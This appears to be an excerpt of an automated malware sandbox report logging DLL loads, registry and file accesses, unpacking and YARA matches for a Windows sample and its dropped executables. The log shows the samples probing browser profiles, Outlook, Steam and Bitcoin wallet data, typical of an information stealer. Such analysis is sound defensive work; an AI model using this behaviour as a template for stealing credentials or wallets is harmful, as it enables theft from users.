Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: wshext.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: apphelp.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: winmm.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: wldp.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: propsys.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: profapi.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: edputil.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: netutils.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: slc.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: userenv.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: sppc.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: mpr.dll
Source: C:\Users\user\1000003002\ead6a72944.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Google Chrome.lnk.26.dr LNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Google Drive.lnk.31.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.31.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.31.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.31.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.31.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.31.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb61252224y source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inisP~ source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbes source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831BSOFTWARE\WOW6432Node\Valve\Steams source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb612522248Software\Bitcoin\Bitcoin-Qtp source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe Unpacked PE file: 5.2.RoamingBKKFHIEGDH.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe Unpacked PE file: 8.2.RoamingAEGIJKEHCA.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 9.2.axplong.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 10.2.axplong.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 15.2.explorti.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Unpacked PE file: 16.2.explorti.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ead6a72944.exe Unpacked PE file: 28.2.ead6a72944.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack
Source: Yara match File source: 28.2.ead6a72944.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.ead6a72944.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\1000003002\ead6a72944.exe, type: DROPPED
